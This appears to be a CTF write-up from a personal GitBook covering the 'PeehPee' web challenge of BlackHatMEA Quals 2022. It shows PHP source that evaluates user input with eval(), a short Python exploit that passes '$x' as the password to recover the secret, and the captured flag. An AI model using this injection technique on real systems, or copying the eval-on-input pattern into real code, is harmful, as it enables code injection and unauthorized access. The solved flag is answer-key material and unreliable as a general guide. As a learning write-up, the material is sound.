Diefunction
  • About
  • Vulnerabilities
    • GHSL-2021-023 / CVE-2021-32819
  • BlachatMEA Finals 2024
  • CTF
    • Technology Control Company
      • Athackcon CTF 2021
        • Trust
        • Config
        • Extend
        • Poison
      • Blackhat MEA 2022
        • CTF Setup on Kali linux
        • Careers
        • SOC Complaints
    • Athackcon
      • POLL
    • Cyber Night 3
      • Client Hell
    • BlackHatMEA Quals 2022
      • Spatify
      • PeehPee
      • Meme generator
      • Black notes
      • Jimmy's blog
    • BlackHatMEA Quals 2023
      • Web - Hardy
      • Web - Authy
      • Reverse engineering - light up the server
    • BlackhatMEA Finals 2024
      • PWN
    • BITSCTF - Reverse Mishap
    • Cybernights 2025
      • REVERSE
      • PWN
    • BYUCTF 2025
      • PWN
Powered by GitBook
On this page
  • Difficulty
  • Points
  • Description
  • Quick Analysis
  • Exploitation
  • The Flag

Was this helpful?

  1. CTF
  2. BlackHatMEA Quals 2022

PeehPee

Difficulty

Easy

Points

150

Description

Are you able to access the secret area of Naruto ? I guess it's not that hard for you!

Quick Analysis

View the application source code via /?source endpoint

from requests import get, post
url = 'https://blackhat4-1f84feb8cf11458ef1fb78a4cfea94f8-0.chals.bh.ctf.sa'
<?php
//Show Page code source
if(isset($_GET["source"])){
    highlight_file(__FILE__);
}
// Juicy PHP Part
$flag=getenv("FLAG");
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if(isset($_POST["email"])&&isset($_POST["pass"])){
        if($_POST["email"]==="admin@naruto.com"){
            $x=$_POST["test"];
            $inp=preg_replace("/[^A-Za-z0-9$]/","",$_POST["pass"]);
            if($inp==="SuperSecRetPassw0rd"){
                die("Hacking Attempt detected");
            }
            else{
                if(eval("return \$inp=\"$inp\";")==="SuperSecRetPassw0rd"){
                    echo $flag;
                }
                else{
                    die("Pretty Close maybe ?");
                }
            }

        }
    }
}
?>

From the source code to obtain the flag:

  • The request method should be POST request.

  • The email parameter value must be admin@naruto.com.

  • The regex match a single character not present in a-z or A-Z or 0-9 or $ for the pass parameter.

  • The pass parameter value shouldn't equal SuperSecRetPassw0rd.

  • The eval function evaluates the pass parameter value.

  • The test parameter value is stored in the $x variable.

Since the pass parameter value is evaluated, the password SuperSecRetPassw0rd can be returned after evaluation via the test parameter $x variable.

Exploitation

data = { 'email': 'admin@naruto.com', 'test': 'SuperSecRetPassw0rd', 'pass': '$x' }
response = post(url, data = data)

The Flag

import re
html = response.text
flag = re.search('BlackHatMEA{(.*)}', html)
print(flag.group(0))
BlackHatMEA{551:17:5d19f71744009b71e8809d46d3b65876dbb5adff}
PreviousSpatifyNextMeme generator

Last updated 2 years ago

Was this helpful?